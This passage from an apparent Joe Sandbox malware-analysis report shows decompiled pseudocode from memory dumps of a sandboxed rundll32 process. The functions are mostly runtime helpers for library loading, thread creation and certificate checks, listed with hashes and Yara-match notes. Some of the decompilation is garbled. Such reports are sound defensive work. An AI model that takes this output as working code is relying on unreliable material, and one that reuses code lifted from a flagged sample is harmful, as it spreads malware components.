                				 *((long long*)(_t109 + 8)) =  *((long long*)(_t109 + 8)) + 1;
                				 *((long long*)(_t109 + 4)) =  *((long long*)(_t109 + 4)) + 1;
                				goto 0x535f3d60;
                				 *((char*)( *((intOrPtr*)(0x53754e50 + _t156 * 8)) + _t141 + 0x3e)) =  *_t138;
                				_t106 =  *((intOrPtr*)(0x53754e50 + _t156 * 8));
                				 *(_t106 + _t141 + 0x3d) =  *(_t106 + _t141 + 0x3d) | 0x00000004;
                				 *((long long*)(_t109 + 4)) =  *((long long*)(_t109 + 4)) + 1;
                				goto 0x535f3eca;
                				_t80 = GetLastError();
                				 *_t109 = _t106;
                				E00007FFA7FFA535F51E0();
                				return _t80;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                • String ID:
                • API String ID: 3659116390-0
                • Opcode ID: 83dccb9937e3ac222778909160735bcc582b8dc578fbd95a744c34ed9864d015
                • Instruction ID: e3d35f6fcd6e256d735954e834aef5e91b0fb3d651fe4a3d538b3c1449825c07
                • Opcode Fuzzy Hash: 83dccb9937e3ac222778909160735bcc582b8dc578fbd95a744c34ed9864d015
                • Instruction Fuzzy Hash: 18518F72B24A5189F710CB65E4443AD3BBAFB86B98F089135DF4E676A8DF38D145C700
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                • String ID:
                • API String ID: 3659116390-0
                • Opcode ID: b9be7c7290749fa8c754aeb00266509b5afe0e1b26437b27dc51158f4b04a1a9
                • Instruction ID: 47665ffa76819a35c101efbd1e1a608eb4c993aa0034f220538d7b89fa91f854
                • Opcode Fuzzy Hash: b9be7c7290749fa8c754aeb00266509b5afe0e1b26437b27dc51158f4b04a1a9
                • Instruction Fuzzy Hash: FB519C33A11A60C9EB24CF75E8483ED7BB0FB98B98F288155DE4A47B98DB34D156C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 35%
                			E000002152152060E42C(void* __edx, void* __esi, intOrPtr __ebp, long long __rbx, char* __rcx, signed char* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9) {
                				void* _v24;
                				intOrPtr _v32;
                				void* _v48;
                				char _v56;
                				intOrPtr _v64;
                				char* _v72;
                				void* _t35;
                				signed int _t42;
                				void* _t45;
                				intOrPtr _t46;
                				signed long long _t79;
                				intOrPtr* _t82;
                				long long _t84;
                				char* _t103;
                				signed char* _t106;
                				signed long long _t113;
                				char* _t122;
                				int _t124;
                				signed char* _t125;
                				int _t127;
                
                				_t84 = __rbx;
                				_t79 = _t113;
                				 *((long long*)(_t79 + 8)) = __rbx;
                				 *((long long*)(_t79 + 0x10)) = __rbp;
                				 *((long long*)(_t79 + 0x18)) = __rsi;
                				 *((long long*)(_t79 + 0x20)) = __rdi;
                				r12d = 0;
                				_t125 = __rdx;
                				_t46 = r12d;
                				if (__rcx == 0) goto 0x2060e46d;
                				if (__r8 != 0) goto 0x2060e469;
                				goto 0x2060e5e9;
                				 *__rcx = r12w;
                				if (__rdx != 0) goto 0x2060e48b;
                				_t35 = E0000021521520603944(_t79);
                				 *_t79 = 0x16;
                				E00000215215205FAABC(_t35);
                				goto 0x2060e5e9;
                				E00000215215205FA5D4(_t79 | 0xffffffff, __rbx,  &_v56, __r9);
                				if (__rcx == 0) goto 0x2060e585;
                				if ( *((intOrPtr*)(_v48 + 0x138)) != _t122) goto 0x2060e4db;
                				if (__r8 == 0) goto 0x2060e5d3;
                				 *__rcx =  *(_t84 + _t125) & 0x000000ff;
                				if ( *(_t84 + _t125) == r12b) goto 0x2060e5d3;
                				_t103 =  &(__rcx[2]);
                				if (_t84 + 1 - __r8 < 0) goto 0x2060e4b8;
                				goto 0x2060e5d3;
                				_v64 = __ebp;
                				r9d = _t46;
                				_v72 = _t103;
                				if (MultiByteToWideChar(_t127, _t124, _t122) != 0) goto 0x2060e5cf;
                				if (GetLastError() != 0x7a) goto 0x2060e56f;
                				r15d = __ebp;
                				_t106 = _t125;
                				if (__ebp == 0) goto 0x2060e543;
                				r15d = r15d - 1;
                				if ( *_t106 == r12b) goto 0x2060e543;
                				if (E000002152152060E924( *_t106 & 0x000000ff,  *_t106 - r12b, _v48,  &_v48) == 0) goto 0x2060e53b;
                				if (_t106[1] == r12b) goto 0x2060e56f;
                				goto 0x2060e518;
                				_t82 = _v48;
                				_v64 = __ebp;
                				r9d = __esi - r14d;
                				_v72 = _t103;
                				_t42 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                				if (_t42 != 0) goto 0x2060e580;
                				E0000021521520603944(_t82);
                				 *_t82 = 0x2a;
                				 *_t103 = r12w;
                				goto 0x2060e5d3;
                				goto 0x2060e5d3;
                				if ( *((intOrPtr*)(_t82 + 0x138)) != _t122) goto 0x2060e59d;
                				if (_t125[(_t42 | 0xffffffff) + 1] != r12b) goto 0x2060e592;
                				goto 0x2060e5d3;
                				r9d = _t46;
                				_v64 = r12d;
                				_v72 = _t122;
                				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0x2060e5cf;
                				_t45 = E0000021521520603944(_t82);
                				 *_t82 = 0x2a;
                				goto 0x2060e5d3;
                				if (_v32 == r12b) goto 0x2060e5e6;
                				 *(_v56 + 0x3a8) =  *(_v56 + 0x3a8) & 0xfffffffd;
                				return _t45;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID:
                • API String ID: 3215553584-0
                • Opcode ID: 0992db94baf726fc03c3fe61251d28ebc32245833e53c1822b8499ec83bbddf5
                • Instruction ID: 04fb3de65d2012d00322216f67854188deb74afae924e78341e3f057ea010014
                • Opcode Fuzzy Hash: 0992db94baf726fc03c3fe61251d28ebc32245833e53c1822b8499ec83bbddf5
                • Instruction Fuzzy Hash: C451E673266BB0C5EB718F51A8483AA77A6FFE0BA4F3846659E65037D8EA35D410C301
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 34%
                			E00007FFA7FFA535ED718(void* __ecx, long long __rbx, void* __rdx, long long __rsi, intOrPtr* __r8, void* __r9) {
                				signed long long _t61;
                				signed long long _t65;
                				intOrPtr _t68;
                				signed long long _t82;
                				struct HINSTANCE__* _t91;
                				signed long long _t92;
                				signed long long _t97;
                				long long _t99;
                				void* _t103;
                				signed long long _t107;
                				signed long long _t109;
                				signed long long _t112;
                				struct HINSTANCE__* _t113;
                				long _t116;
                				void* _t119;
                				WCHAR* _t121;
                
                				 *((long long*)(_t103 + 8)) = __rbx;
                				 *((long long*)(_t103 + 0x10)) = _t99;
                				 *((long long*)(_t103 + 0x18)) = __rsi;
                				r14d = __ecx;
                				_t109 =  *0x53754140; // 0x3c63485c5c92
                				_t92 = _t91 | 0xffffffff;
                				_t82 = _t109 ^  *(0x7ffa535e0000 + 0x1755f0 + _t119 * 8);
                				asm("dec eax");
                				if (_t82 == _t92) goto 0x535ed899;
                				if (_t82 == 0) goto 0x535ed781;
                				_t61 = _t82;
                				goto 0x535ed89b;
                				if (__r8 == __r9) goto 0x535ed82d;
                				_t97 =  *((intOrPtr*)(__r8));
                				_t68 =  *((intOrPtr*)(0x7ffa535e0000 + 0x175550 + _t97 * 8));
                				if (_t68 == 0) goto 0x535ed7a1;
                				if (_t68 == _t92) goto 0x535ed819;
                				goto 0x535ed814;
                				r8d = 0x800;
                				LoadLibraryExW(_t121, _t119, _t116);
                				if (_t61 != 0) goto 0x535ed7e2;
                				GetLastError();
                				if (_t61 != 0x57) goto 0x535ed7e0;
                				r8d = 0;
                				LoadLibraryExW(??, ??, ??);
                				goto 0x535ed7e2;
                				if (0 != 0) goto 0x535ed7fb;
                				 *((intOrPtr*)(0x7ffa535e0000 + 0x175550 + _t97 * 8)) = _t92;
                				goto 0x535ed819;
                				_t19 = 0x7ffa535e0000 + 0x175550 + _t97 * 8;
                				_t65 =  *_t19;
                				 *_t19 = 0;
                				if (_t65 == 0) goto 0x535ed814;
                				FreeLibrary(_t113);
                				if (0 != 0) goto 0x535ed86e;
                				if (__r8 + 4 != __r9) goto 0x535ed78a;
                				if (0 == 0) goto 0x535ed87e;
                				GetProcAddress(_t91);
                				if (_t65 == 0) goto 0x535ed877;
                				_t107 =  *0x53754140; // 0x3c63485c5c92
                				asm("loope 0x41");
                				asm("dec eax");
                				 *(0x7ffa535e0000 + 0x1755f0 + _t119 * 8) = _t65 ^ _t107;
                				goto 0x535ed89b;
                				goto 0x535ed82f;
                				_t112 =  *0x53754140; // 0x3c63485c5c92
                				asm("enter 0xd348, 0xcf");
                				 *(0x7ffa535e0000 + 0x1755f0 + _t119 * 8) = _t92 ^ _t112;
                				return r10d;
                			}

                APIs
                • GetProcAddress.KERNEL32(?,00003C63485C5C92,FFFFFFFF,00007FFA535EDAE3,?,?,00000000,00007FFA535E8B23,?,?,00003C63485C5C92,00007FFA535E8389), ref: 00007FFA535ED83A
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: AddressProc
                • String ID:
                • API String ID: 190572456-0
                • Opcode ID: 5dc0bb12abbf4a7a14033368e2d0c6602d9198ce90f65ce4c3b152005258811c
                • Instruction ID: e52e3fb4c5b8affbfb8a43defc3987157ecd289b4e0e31051c91c42c01c15d51
                • Opcode Fuzzy Hash: 5dc0bb12abbf4a7a14033368e2d0c6602d9198ce90f65ce4c3b152005258811c
                • Instruction Fuzzy Hash: D9411361F2AF428DFA159B12A80463523DBBF96B90F0DE534DD1D6B394EE3CE4049340
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 36%
                			E000002152152060C60C(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                				signed long long _t72;
                				signed long long _t76;
                				intOrPtr _t78;
                				signed long long _t80;
                				signed long long _t89;
                				struct HINSTANCE__* _t94;
                				signed long long _t95;
                				long long _t101;
                				void* _t105;
                				signed long long _t109;
                				signed long long _t111;
                				signed long long _t114;
                				struct HINSTANCE__* _t115;
                				long _t118;
                				void* _t121;
                				WCHAR* _t123;
                
                				 *((long long*)(_t105 + 8)) = __rbx;
                				 *((long long*)(_t105 + 0x10)) = _t101;
                				 *((long long*)(_t105 + 0x18)) = __rsi;
                				r14d = __ecx;
                				_t111 =  *0x2067c720; // 0xca1645d940e
                				_t95 = _t94 | 0xffffffff;
                				_t89 = _t111 ^  *(0x21520580000 + 0x102a10 + _t121 * 8);
                				asm("dec eax");
                				if (_t89 == _t95) goto 0x2060c78d;
                				if (_t89 == 0) goto 0x2060c675;
                				_t72 = _t89;
                				goto 0x2060c78f;
                				if (__r8 == __r9) goto 0x2060c721;
                				_t78 =  *((intOrPtr*)(0x21520580000 + 0x102970 + __rsi * 8));
                				if (_t78 == 0) goto 0x2060c695;
                				if (_t78 == _t95) goto 0x2060c70d;
                				goto 0x2060c708;
                				r8d = 0x800;
                				LoadLibraryExW(_t123, _t121, _t118);
                				if (_t72 != 0) goto 0x2060c6d6;
                				if (GetLastError() != 0x57) goto 0x2060c6d4;
                				r8d = 0;
                				LoadLibraryExW(??, ??, ??);
                				_t80 = _t72;
                				goto 0x2060c6d6;
                				if (_t80 != 0) goto 0x2060c6ef;
                				 *((intOrPtr*)(0x21520580000 + 0x102970 + __rsi * 8)) = _t95;
                				goto 0x2060c70d;
                				_t19 = 0x21520580000 + 0x102970 + __rsi * 8;
                				_t76 =  *_t19;
                				 *_t19 = _t80;
                				if (_t76 == 0) goto 0x2060c708;
                				FreeLibrary(_t115);
                				if (_t80 != 0) goto 0x2060c762;
                				if (__r8 + 4 != __r9) goto 0x2060c67e;
                				if (_t80 == 0) goto 0x2060c772;
                				GetProcAddress(_t94);
                				if (_t76 == 0) goto 0x2060c76b;
                				_t109 =  *0x2067c720; // 0xca1645d940e
                				asm("dec eax");
                				 *(0x21520580000 + 0x102a10 + _t121 * 8) = _t76 ^ _t109;
                				goto 0x2060c78f;
                				goto 0x2060c723;
                				_t114 =  *0x2067c720; // 0xca1645d940e
                				asm("dec eax");
                				 *(0x21520580000 + 0x102a10 + _t121 * 8) = _t95 ^ _t114;
                				return 0;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc
                • String ID:
                • API String ID: 190572456-0
                • Opcode ID: da2dcc0ebf5a72fbf061310880e0f58bfdef0c225deb5f59865ec9a74e6b18ee
                • Instruction ID: 2d9902b37e5ce6cd7effcebab56555595fea5a96e85f8f31a7b95345e91263a1
                • Opcode Fuzzy Hash: da2dcc0ebf5a72fbf061310880e0f58bfdef0c225deb5f59865ec9a74e6b18ee
                • Instruction Fuzzy Hash: A841BF33353E20C2FA359B51981C7A66297BFA8BF0F294565DD194B798DF38E4488700
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Locinfo::_Lockit$GetcvtLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                • String ID:
                • API String ID: 1677860746-0
                • Opcode ID: 2a9a9126a73817e00c1239c54fc2971a4612be1ba46b2189fd7c7a0543591afa
                • Instruction ID: 3a8d6e5a0bdc1c031fea4f9bb94fe309264d7557da9462c328f5aeca6129b3ef
                • Opcode Fuzzy Hash: 2a9a9126a73817e00c1239c54fc2971a4612be1ba46b2189fd7c7a0543591afa
                • Instruction Fuzzy Hash: BC413637B46F90C9EB11DFB4D8542DC33B9EFA5788F0542569E4923AADDE34861AC340
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 25%
                			E00000215215205997A0(void* __eax, long long __rbx, long long __rcx, void* __rdx, long long __rdi, void* __r8) {
                				void* _t55;
                				long long _t57;
                				long long _t58;
                				long long _t60;
                				long long _t63;
                				void* _t71;
                				void* _t72;
                				void* _t74;
                				void* _t75;
                
                				_t55 = _t74;
                				 *((long long*)(_t55 + 8)) = __rcx;
                				_t72 = _t55 - 0x5f;
                				_t75 = _t74 - 0xc0;
                				 *((long long*)(_t72 + 0x37)) = 0xfffffffe;
                				 *((long long*)(_t55 + 0x10)) = __rbx;
                				 *((long long*)(_t55 + 0x18)) = __rdi;
                				 *((long long*)(_t72 + 0x17)) = __rcx;
                				 *((long long*)(_t72 + 0x1f)) = __rcx;
                				 *((long long*)(_t72 + 0x27)) = __rcx;
                				 *((long long*)(_t72 + 0x2f)) = __rcx;
                				 *((intOrPtr*)(_t72 + 0x17)) = 0x20;
                				_t63 = _t72 + 0x67;
                				 *((long long*)(_t75 + 0x38)) = _t63;
                				 *((long long*)(_t75 + 0x30)) = _t63;
                				 *((intOrPtr*)(_t75 + 0x28)) = 0;
                				 *((long long*)(_t75 + 0x20)) = _t72 + 0x17;
                				r8d = 0;
                				__imp__CertGetCertificateChain(_t71);
                				if (__eax != 0) goto 0x2059981b;
                				GetLastError();
                				goto 0x205998a7;
                				_t57 = __imp__CertFreeCertificateChain;
                				 *((long long*)(_t72 + 0x3f)) = _t57;
                				_t60 =  *((intOrPtr*)(_t72 + 0x67));
                				 *((long long*)(_t72 + 0x47)) = _t60;
                				 *((long long*)(_t72 - 0x19)) = _t57;
                				 *((long long*)(_t72 - 0x11)) = _t57;
                				 *((long long*)(_t72 - 9)) = _t57;
                				 *((intOrPtr*)(_t72 - 0x19)) = 0x18;
                				 *((intOrPtr*)(_t72 - 0x15)) = 2;
                				 *((long long*)(_t72 - 0x29)) = _t57;
                				 *((intOrPtr*)(_t72 - 0x29)) = 0x10;
                				_t58 = _t72 - 0x19;
                				 *((long long*)(_t72 - 0x21)) = _t58;
                				 *((long long*)(_t72 - 1)) = _t58;
                				 *((long long*)(_t72 + 7)) = _t58;
                				 *((long long*)(_t72 + 0xf)) = _t58;
                				 *((intOrPtr*)(_t72 - 1)) = 0x18;
                				__imp__CertVerifyCertificateChainPolicy();
                				if (0 != 0) goto 0x20599894;
                				GetLastError();
                				goto 0x20599897;
                				if (_t60 == 0) goto 0x205998a5;
                				__imp__CertFreeCertificateChain();
                				return  *((intOrPtr*)(_t72 + 3));
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CertCertificateChain$ErrorLast$FreePolicyVerify
                • String ID:
                • API String ID: 3047530627-0
                • Opcode ID: d03ea8748dffdf280ca1bdb0017c06efe0016a6ea8ee578800e6b06a0cadf3d2
                • Instruction ID: 375315768cf9d989abb997c52ee60d06f36dc8447c54d5667b5045a0eb3cd163
                • Opcode Fuzzy Hash: d03ea8748dffdf280ca1bdb0017c06efe0016a6ea8ee578800e6b06a0cadf3d2
                • Instruction Fuzzy Hash: 0A31F073606B04CEE7608FA0E8487EC33B9F798758F044569AA8D93B88DB34D528C794
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 40%
                			E00000215215205FACE4(void* __ecx, void* __edx, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16, char _a24, intOrPtr _a40) {
                				long long _v16;
                				intOrPtr _v24;
                				void* _t12;
                				intOrPtr* _t34;
                				long long _t35;
                				intOrPtr* _t38;
                
                				_t34 = __rax;
                				_a8 = __rbx;
                				_a16 = __rsi;
                				if (__r8 != 0) goto 0x205fad14;
                				_t12 = E0000021521520603944(__rax);
                				 *__rax = 0x16;
                				E00000215215205FAABC(_t12);
                				goto 0x205fad94;
                				E00000215215205FAC84(__rax, __rbx, __r8, __r9, __rcx);
                				_t38 = _t34;
                				if (_t34 == 0) goto 0x205fad64;
                				_t35 =  &_a24;
                				_v16 = _t35;
                				_v24 = _a40;
                				CreateThread(??, ??, ??, ??, ??, ??);
                				if (_t35 != 0) goto 0x205fada4;
                				E00000215215206038D4(GetLastError(), _t35, _t38);
                				if (_t38 == 0) goto 0x205fad91;
                				if ( *((intOrPtr*)(_t38 + 0x10)) == 0) goto 0x205fad7a;
                				CloseHandle(??);
                				if ( *((intOrPtr*)(_t38 + 0x18)) == 0) goto 0x205fad89;
                				FreeLibrary(??);
                				return E000002152152060A780(_t35, _t38);
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                • String ID:
                • API String ID: 2067211477-0
                • Opcode ID: 4ff82f22711257fcade4677121f4d70aa40d09b1cab677f196644615d55f73c8
                • Instruction ID: 1adc71535c9dbef1c26233b5f3fd782b7af78050c17f9b3793ce2255e51cda8b
                • Opcode Fuzzy Hash: 4ff82f22711257fcade4677121f4d70aa40d09b1cab677f196644615d55f73c8
                • Instruction Fuzzy Hash: 86218EB7307F60C6EE25DB61E41C2EAA3A1AFE5B85F1844A0AE4943B6DDE3CD4048601
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E00007FFA7FFA535F0A88(signed int __ecx, void* __edx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                				signed char _t24;
                				signed int _t29;
                				signed int _t30;
                				signed int _t31;
                				signed long long _t38;
                				signed long long _t39;
                				signed int* _t47;
                
                				_a8 = __rbx;
                				_a16 = __rsi;
                				_t38 = _t39 & 0x0000001f;
                				_t47 = _t39;
                				if ((__ecx & 0x00000008) == 0) goto 0x535f0ab9;
                				if (__edx >= 0) goto 0x535f0ab9;
                				 *((long long*)(_t38 + 0x57ebf7e3)) =  *((long long*)(_t38 + 0x57ebf7e3)) + 1;
                				asm("adc [eax+0xf], ecx");
                				 *((long long*)(_t38 + 0x3cebfbe3)) =  *((long long*)(_t38 + 0x3cebfbe3)) + 1;
                				_t29 = dil & 0x00000001;
                				if (_t29 == 0) goto 0x535f0af0;
                				asm("dec eax");
                				if (_t29 >= 0) goto 0x535f0af0;
                				 *((long long*)(_t38 + 0x20ebfee3)) =  *((long long*)(_t38 + 0x20ebfee3)) + 1;
                				_t30 = dil & 0x00000002;
                				if (_t30 == 0) goto 0x535f0b10;
                				asm("dec eax");
                				if (_t30 >= 0) goto 0x535f0b10;
                				_t31 = dil & 0x00000010;
                				if (_t31 == 0) goto 0x535f0b0d;
                				 *((long long*)(_t38 - 0x9bf021d)) =  *((long long*)(_t38 - 0x9bf021d)) + 1;
                				asm("invalid");
                				if (_t31 == 0) goto 0x535f0b2a;
                				asm("dec eax");
                				if (_t31 >= 0) goto 0x535f0b2a;
                				 *((long long*)(_t38 - 0x74b7101d)) =  *((long long*)(_t38 - 0x74b7101d)) + 1;
                				if (_t31 == 0) goto 0x535f0b52;
                				asm("rol byte [ebp+0x5c8b48db], 0x24");
                				 *_t47 =  *_t47 ^ __ecx;
                				asm("ror byte [eax-0x7d], 0xc4");
                				 *(_t47 - 0x3d) =  *(_t47 - 0x3d) & _t24;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _set_statfp
                • String ID:
                • API String ID: 1156100317-0
                • Opcode ID: 9e637d860787cd7530e08ec34b9611fe00c3f0bd966f6bff25759c960a0e2ccc
                • Instruction ID: 83885d8ba2104064e4ed76b75ce5aeb04fb968a19f196ac4118698f778bbb879
                • Opcode Fuzzy Hash: 9e637d860787cd7530e08ec34b9611fe00c3f0bd966f6bff25759c960a0e2ccc
                • Instruction Fuzzy Hash: 951160B6E78F031DF6581368E85137D114B6FD63A8E4CE634EAAE275D68E6CA4448200
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			E0000021521520617C88(signed int __ecx, void* __edx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                				signed int _t27;
                				signed int _t28;
                				signed int _t29;
                				signed int _t30;
                				signed int _t31;
                				signed int _t43;
                				signed int _t44;
                				signed int _t45;
                				signed int _t47;
                				void* _t52;
                
                				_a8 = __rbx;
                				_a16 = __rsi;
                				_t27 = __ecx & 0x0000001f;
                				if ((__ecx & 0x00000008) == 0) goto 0x20617cb9;
                				if (__edx >= 0) goto 0x20617cb9;
                				E00000215215206131F4(_t27, _t52);
                				_t28 = _t27 & 0xfffffff7;
                				goto 0x20617d10;
                				_t43 = 0x00000004 & dil;
                				if (_t43 == 0) goto 0x20617cd4;
                				asm("dec eax");
                				if (_t43 >= 0) goto 0x20617cd4;
                				E00000215215206131F4(_t28, _t52);
                				_t29 = _t28 & 0xfffffffb;
                				goto 0x20617d10;
                				_t44 = dil & 0x00000001;
                				if (_t44 == 0) goto 0x20617cf0;
                				asm("dec eax");
                				if (_t44 >= 0) goto 0x20617cf0;
                				E00000215215206131F4(_t29, _t52);
                				_t30 = _t29 & 0xfffffffe;
                				goto 0x20617d10;
                				_t45 = dil & 0x00000002;
                				if (_t45 == 0) goto 0x20617d10;
                				asm("dec eax");
                				if (_t45 >= 0) goto 0x20617d10;
                				if ((dil & 0x00000010) == 0) goto 0x20617d0d;
                				E00000215215206131F4(_t30, _t52);
                				_t31 = _t30 & 0xfffffffd;
                				_t47 = dil & 0x00000010;
                				if (_t47 == 0) goto 0x20617d2a;
                				asm("dec eax");
                				if (_t47 >= 0) goto 0x20617d2a;
                				E00000215215206131F4(_t31, _t52);
                				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _set_statfp
                • String ID:
                • API String ID: 1156100317-0
                • Opcode ID: 2011e68a8fb9851642cd3d370e902918837add7e0efacca9b0130383fcbbf733
                • Instruction ID: 6c42a0c9dee129186061456b97cdf236058e5d16b8296e834e4426928430ceb8
                • Opcode Fuzzy Hash: 2011e68a8fb9851642cd3d370e902918837add7e0efacca9b0130383fcbbf733
                • Instruction Fuzzy Hash: 56119133A51E75C5FE781128F48F3FAD061AFF53A0F384A94AF66067EEDA34A4414241
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E00000215215205FAC10(long long _a8) {
                				void* _t7;
                				long long _t8;
                				void* _t9;
                				void* _t10;
                				void* _t11;
                				void* _t14;
                
                				_a8 = _t8;
                				E000002152152060C3C8(_t7, _t8, _t9, _t10, _t11, _t14);
                				if (_t7 != 0) goto 0x205fac2f;
                				ExitThread(??);
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ExitThread$ErrorLast$CloseFreeHandleLibrary
                • String ID:
                • API String ID: 3508756349-0
                • Opcode ID: 0cf7138ffa703db898d6705dbb032dcc36faa26b13de654aea811f69f9e4c263
                • Instruction ID: 9e29340884d3236fb1fb14a47b984b2f13f10734d7e9796d10489f6679209cd4
                • Opcode Fuzzy Hash: 0cf7138ffa703db898d6705dbb032dcc36faa26b13de654aea811f69f9e4c263
                • Instruction Fuzzy Hash: 2F018872302E54D7EA18EB30949C39C23A5AFE5774F201B58AE3943AEDDF3898548341
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Wait$CloseHandleMultipleObjectObjectsQueueSingleTerminateThreadUser
                • String ID:
                • API String ID: 3892215915-0
                • Opcode ID: 2a4119c427f675659302ac9c4084ee3897c0f4525e6df9514648f93a5a6e469d
                • Instruction ID: 090962c8b4f7d7c97ea2a18f5cf12a40cbc0c32cda0a9bfcd3ec5761c152815b
